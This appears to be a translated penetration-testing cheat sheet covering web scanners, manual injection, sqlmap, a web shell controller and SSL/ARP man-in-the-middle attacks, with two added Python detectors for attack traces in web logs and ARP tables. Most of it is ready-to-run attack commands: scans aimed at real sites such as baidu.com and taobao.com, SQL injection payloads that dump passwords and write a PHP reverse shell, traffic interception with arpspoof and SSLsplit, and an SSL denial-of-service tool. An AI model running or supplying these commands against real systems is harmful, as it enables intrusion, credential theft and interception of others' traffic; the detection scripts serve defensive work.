Scanning tools
- Update Nikto: nikto -update
- List the available plugins: nikto -list-plugins
- Scan a target:
- nikto -host http://www.baidu.com/web/
- nikto -host 192.168.1.109 -port 80
- nikto -host www.baidu.com -port 443,8443,995 -ssl
- nikto -host 12.168.1.103 -port 80 -evasion 167
- nmap -p80 192.168.1.0/24 -oG - | nikto -host -
- nikto -host https://www.baidu.com -useproxy http://localhost:8087
Using the skipfish vulnerability scanner
- skipfish -o test http://www.ebay.com/usr/
- skipfish -o test @url.txt
- Scan with one of the bundled dictionaries:
- Locate the dictionaries: dpkg -L skipfish | grep wl
- skipfish -o test -S /usr/share/skipfish/dictionaries/minimal.wl http://1.1.1.1
- Authenticated scan using credentials or an extracted cookie:
- skipfish -A user:pass -o test http://1.1.1.1
- skipfish -C "name=val" -o test http://1.1.1.1
Using Vega
- Download from the official site: https://subgraph.com/vega/download/
- Change to the directory holding the archive and run:
unzip VegaBuild-linux.gtk.x86_64.zip (the archive's name) -d vega/
- After installation, start Vega with:
./Vega
- If Vega fails to start, the installed Java version may be too new; switch to an older Java with:
update-alternatives --config java
Installing w3af
- Update the package sources:
Open the sources list: vi /etc/apt/sources.list
# replace the package sources
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://ftp.de.debian.org/debian buster main
# update:
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
- Download: git clone https://github.com/andresriancho/w3af.git
- Install pybloomfiltermmap: apt install -y python-pybloomfiltermmap
- Edit the dependency configuration:
- vim w3af/core/controllers/dependency_check/requirements.py
- PIPDependency('pybloomfilter', 'pybloomfiltermmap', '0.3.15')
- PIPDependency('OpenSSL', 'pyOpenSSL', '16.2.0')
- PIPDependency('lxml', 'lxml', '3.7.1')
- vim w3af/core/controllers/dependency_check/platforms/mac.py
- MAC_CORE_PIP_PACKAGES.remove(PIPDependency('pybloomfilter', 'pybloomfiltermmap', '0.3.15'))
- vim w3af/core/controllers/dependency_check/requirements.py
- Install python-pip: apt-get install python-setuptools python-pip
- Running (1) ./w3af_gui or (2) ./w3af_console generates the dependency script (3) /tmp/w3af_dependency_install.sh
- Update the npm package: (1) npm install -g retire@2.0.3 (2) npm update -g retire
- Use the console version: (1) ./w3af_console (2) sudo pip install xdot==0.6
- Install the GUI dependencies:
- 1. Download the .deb packages:
- wget http://ftp.br.debian.org/debian/pool/main/p/pywebkitgtk/python-webkit_1.1.8-3_amd64.deb
- wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
- wget http://ftp.br.debian.org/debian/pool/main/p/python-support/python-support_1.0.15_all.deb
- wget http://ftp.br.debian.org/debian/pool/main/w/webkitgtk/libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
- Install the packages in this order:
- dpkg -i libjavascriptcoregtk-1.0-0_2.4.11-3_amd64.deb
- dpkg -i python-support_1.0.15_all.deb
- dpkg -i libwebkitgtk-1.0-0_2.4.11-3_amd64.deb
- dpkg -i python-webkit_1.1.8-3_amd64.deb
- Fix the remaining dependencies: apt-get -f install -y
- Run the GUI: ./w3af_gui
- If a module is reported missing, install it: apt-get install python-gtksourceview2
Manual vulnerability discovery
1. Wordlists and brute-force dictionaries: /usr/share/wfuzz/wordlist/
2. Test strings appended to the end of a URL:
• ?file=../../../../etc/passwd
• ?page=file:///etc/passwd
• ?home=main.cgi
• ?page=http://www.a.com/1.php
• http://1.1.1.1/../../../../dir/file.txt
• "." "%00"  # bypass file-extension checks
- SQL injection:
- ' union select database(),substring_index(USER(),"@",1)--
- @@datadir, @@hostname, @@VERSION, user(), @@version_compile_os, database()
- Concatenate strings: CONCAT_WS(CHAR(32,58,32),user(),database(),version())
• ' union select table_name,table_schema from information_schema.tables--+
• ' UNION select table_schema,count(*) FROM information_schema.tables group by table_schema --
• ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
• ' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+
• ' union select user,password from dvwa.users--+
• ' union select user,password from users--+
• ' union select null, concat(user,0x3a,password) from users--+
- Crack the password hashes with john to recover the plaintext passwords:
- john --format=raw-MD5 dvwa.txt
- Read a file: ' union SELECT null, load_file('/etc/passwd')--+
- Write a file: ' union select null,"" INTO DUMPFILE "/var/www/a.php" --+
- MySQL account (hex-encode the PHP file before writing it):
- cat php-reverse-shell.php | xxd -ps | tr -d '\n'
- ' union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'--
- Save and download the database:
- ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--
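The nikto/skipfish scans at the top of these notes and the UNION-based payloads listed just above all leave recognisable traces in a web server's access log. The following Python script is an added detection example; it is not part of the original notes and not code from any of the tools named here. It parses Apache combined-format log lines (the lines below are constructed for the example and so labelled), URL-decodes the request, and tags each line that matches the payload shapes from this section (UNION SELECT, information_schema enumeration, load_file, INTO DUMPFILE/OUTFILE, ../ traversal, %00 null bytes) or carries a scanner name in its User-Agent. The User-Agent strings, IP addresses and paths are assumptions made up for the sample, and the rule set is a starting point, not a complete WAF signature list.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache "combined" format). Not from a real server:
# the hosts, paths and User-Agent strings are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1'%20union%20select%20table_name,table_schema%20from%20information_schema.tables--+ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1'%20union%20SELECT%20null,%20load_file('/etc/passwd')--+ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1'%20union%20select%20null,%22%22%20INTO%20DUMPFILE%20%22/var/www/a.php%22%20--+ HTTP/1.1" 500 128 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/test.cgi?file=../../../../etc/passwd%00.jpg HTTP/1.1" 404 90 "-" "Mozilla/5.00 (Nikto/2.1.6) (constructed)"
10.0.0.3 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=union%20station HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures modelled on the payload shapes listed in the section above. They are applied
# to the URL-decoded request so %20/%22 encoding does not hide the keywords.
REQUEST_RULES = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(dump|out)file\b", re.I),
    "path_traversal": re.compile(r"(\.\./){2,}|file://", re.I),
    "null_byte": re.compile(r"\x00"),
}
# Assumption: the scanners keep their default User-Agent, which names the tool.
UA_RULES = {
    "scanner_ua": re.compile(r"nikto|skipfish", re.I),
}


def analyze(log_text):
    """Return one finding per suspicious line: source ip, status, decoded path, sorted tags."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        decoded = unquote_plus(m["path"])  # also turns %00 into a real NUL byte
        tags = [name for name, rx in REQUEST_RULES.items() if rx.search(decoded)]
        tags += [name for name, rx in UA_RULES.items() if rx.search(m["ua"])]
        if tags:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "path": decoded, "tags": sorted(tags)})
    return findings


def by_source(findings):
    """Aggregate tags per source IP so one noisy host surfaces as a single alert."""
    summary = {}
    for f in findings:
        summary.setdefault(f["ip"], set()).update(f["tags"])
    return summary


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['status']} {','.join(f['tags']):<40} {f['path']!r}")
    for ip, tags in by_source(analyze(SAMPLE_LOG)).items():
        print(f"{ip}: {', '.join(sorted(tags))}")
```

Run it against a real log with `analyze(open(path).read())`; the per-source summary is what to alert on, because a single host producing union_select together with file_read or file_write is far more significant than any one matching line. The decoded path is printed with `repr()` so the NUL byte from a `%00` payload stays visible.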
sqlmap injection
1. sqlmap -h / -hh / -u
2. sqlmap -d "mysql://user:password@192.168.20.10:3306/dvwa" -f --users --banner --dbs --schema -a
3. Options that follow sqlmap -u url --data="name=value&pwd=value":
• --current-user
• --current-db
• --hostname
• --users
• --privileges -U username
• --roles
• --dbs
• --tables, --exclude-sysdbs -D dvwa
• -T users -D dvwa -C user --columns
Webacoo web shell controller
- Generate the server side: webacoo -g -o a.php
- Connect from the client: webacoo -t -u http://1.1.1.1/a.php
SSL certificate attacks
1. View the certificate: openssl s_client -connect www.baidu.com:443
2. List the cipher suites supported over TLS: sslscan --tlsall www.taobao.com:443
3. Check the certificate:
sslscan --show-certificate --no-ciphersuites www.taobao.com
sslyze --regular www.taobao.com
nmap --script=ssl-enum-ciphers.nse www.taobao.com
Website: https://www.ssllabs.com
4. Connect with a chosen protocol version and cipher: openssl s_client -tls1_2 -cipher 'CIPHER' -connect url
5. Forge a certificate:
a. Generate the CA private key: openssl genrsa -out ca.key 2048
b. Create a self-signed certificate from that key: openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
6. SSL/TLS man-in-the-middle with iptables and SSLsplit:
a. Enable IP forwarding: sysctl -w net.ipv4.ip_forward=1 (/proc/sys/net/ipv4/ip_forward)
b. iptables port-forwarding rules (redirect the intercepted traffic to the listening ports):
• iptables -t nat -F (flush the existing NAT rules)
• iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
• iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
• iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
• iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
• iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
• iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
• iptables -t nat -L
c. Start the hijack for SSLsplit (ARP spoofing): arpspoof -i eth0 -t 192.168.0.115 192.168.0.1
d. Run SSLsplit and log the intercepted connections: sslsplit -D -l connect.log -j /root/test -S test/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
7. SSL/TLS man-in-the-middle with mitmproxy:
a. iptables -t nat -F (flush the existing NAT rules)
b. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
8. SSLstrip (plaintext between the client and the man-in-the-middle): sslstrip -l 8080
9. Resource-exhaustion (DoS) attack: thc-ssl-dos ip
Man-in-the-middle attacks with arpspoof
Capture packets with OmniPeek:
- On the Windows side: arp -d
ping ip
- Filter out the ARP packets:
- 1. Right-click "send" and change the adapter
- 2. Set the packet data.
Command: dsniff
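Every interception setup in these notes (iptables + SSLsplit, mitmproxy, and the OmniPeek/dsniff capture) depends on the arpspoof step, which makes the targeted host believe the gateway's IP belongs to the attacker's MAC address. The following Python script is an added detection example; it is not part of the original notes and not code from arpspoof, SSLsplit or any other tool named here. It parses two /proc/net/arp-style snapshots (constructed sample data with made-up MAC addresses, labelled as such) and alerts when the gateway's MAC changes between snapshots or when one MAC answers for several IPs, which is exactly the state that `arpspoof -t 192.168.0.115 192.168.0.1` produces on the host 192.168.0.115.

```python
import re

# Header line of /proc/net/arp on Linux; the columns are IP, HW type, Flags, HW address, Mask, Device.
HEADER_RE = re.compile(r"^IP address\s+HW type")

# Constructed snapshot taken before any tampering (made-up MAC addresses, not a real capture).
BASELINE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         aa:bb:cc:00:00:01     *        eth0
192.168.0.115    0x1         0x2         aa:bb:cc:00:00:15     *        eth0
192.168.0.50     0x1         0x2         aa:bb:cc:00:00:50     *        eth0
"""

# Constructed snapshot from the same host a little later: the gateway entry now carries the
# MAC of 192.168.0.50, and an incomplete (flags 0x0) entry has appeared.
SPOOFED_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         aa:bb:cc:00:00:50     *        eth0
192.168.0.115    0x1         0x2         aa:bb:cc:00:00:15     *        eth0
192.168.0.50     0x1         0x2         aa:bb:cc:00:00:50     *        eth0
192.168.0.200    0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_proc_arp(text):
    """Return {ip: mac} for the complete (flags 0x2) entries of a /proc/net/arp dump."""
    table = {}
    for line in text.splitlines():
        if not line.strip() or HEADER_RE.match(line):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # tolerate a truncated line instead of aborting
        ip, _hwtype, flags, mac, _mask, _dev = fields[:6]
        if flags != "0x2":
            continue  # 0x0 marks an incomplete entry with no usable MAC
        table[ip] = mac.lower()
    return table


def detect_arp_spoof(baseline, current, gateway_ip):
    """Compare two ARP tables and return a list of human-readable alerts (empty if clean)."""
    alerts = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed: {old} -> {new}")
    ips_by_mac = {}
    for ip, mac in current.items():
        ips_by_mac.setdefault(mac, []).append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            # One MAC for several IPs is legitimate for routers with secondary addresses
            # or virtualisation hosts, so this is an indicator to corroborate, not proof.
            alerts.append(f"{mac} answers for several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    base = parse_proc_arp(BASELINE_ARP)
    now = parse_proc_arp(SPOOFED_ARP)
    for alert in detect_arp_spoof(base, now, "192.168.0.1"):
        print("ALERT:", alert)
```

On a real Linux host the snapshots come from `cat /proc/net/arp` (or `ip neigh`, with a different layout), taken once at boot and then periodically; a static ARP entry for the gateway, or dynamic ARP inspection on the switch, is the corresponding mitigation.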